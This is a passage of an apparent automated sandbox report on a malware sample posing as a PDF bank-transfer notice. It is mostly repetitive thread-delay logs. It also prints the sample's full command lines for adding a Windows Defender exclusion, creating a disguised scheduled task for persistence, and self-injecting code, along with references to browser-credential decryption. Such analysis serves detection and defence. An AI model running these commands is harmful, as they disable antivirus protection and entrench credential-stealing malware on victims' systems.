                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -598204s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -598079s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -597954s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -597829s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -597704s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -597579s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -597454s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -597329s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -597204s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -597079s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -596954s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -596829s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -596684s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -596578s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -596469s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -596359s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -596250s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -596141s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -596032s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -595907s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -595797s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -595688s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -595563s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -595438s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -595312s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -595203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -595094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -594962s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -594844s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -594621s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -594516s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -594406s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -594297s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860Thread sleep time: -594188s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597797Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597469Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596922Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596575Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596453Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596343Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596234Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596125Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 596015Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595906Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595797Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595687Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595578Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595359Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595140Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 594921Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 594811Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 594661Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeThread delayed: delay time: 594546Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599769Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599532Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599407Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599282Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599157Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 599032Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598813Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598688Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598563Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598204Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 598079Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597954Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597829Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597704Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597579Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597454Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597329Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597204Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 597079Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596954Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596829Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596684Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 596032Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595907Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595688Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595563Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 595094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594962Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594844Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594621Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594516Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeThread delayed: delay time: 594188Jump to behavior
                    Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3711942483.0000000001001000.00000004.00000020.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3711945481.0000000000FF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeMemory written: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeMemory written: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeQueries volume information: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
